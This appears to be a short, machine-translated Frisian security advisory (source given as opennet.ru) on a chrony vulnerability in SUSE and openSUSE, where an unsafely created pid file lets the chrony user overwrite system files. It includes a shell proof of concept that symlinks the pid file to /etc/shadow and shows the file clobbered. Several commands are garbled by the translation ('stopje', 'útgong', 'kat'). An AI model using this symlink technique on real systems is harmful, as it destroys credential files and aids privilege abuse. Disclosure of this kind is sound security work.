В
De kwetsberens wurdt feroarsake troch it ûnfeilige oanmeitsjen fan in pid-bestân, dat waard makke op in poadium doe't chrony de privileezjes noch net hie weromset en as root rûn. Yn dit gefal is de map /run/chrony, wêryn it pid-bestân skreaun is, makke mei rjochten 0750 fia systemd-tmpfiles of doe't chronyd waard lansearre yn ferbân mei de brûker en groep "chrony". Sa, as jo tagong hawwe ta de brûker chrony, is it mooglik om te ferfangen de pid triem /run/chrony/chronyd.pid mei in symboalyske keppeling. In symboalyske keppeling kin ferwize nei elk systeembestân dat sil wurde oerskreaun as chronyd wurdt lansearre.
root # systemctl stopje chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ útgong
root# /usr/sbin/chronyd -n
^C
# ynstee fan de ynhâld fan /etc/shadow sil de chronyd-proses-ID wurde bewarre
root# kat /etc/shadow
15287
Kwetsberens
SUSE en openSUSE probleem
Boarne: opennet.ru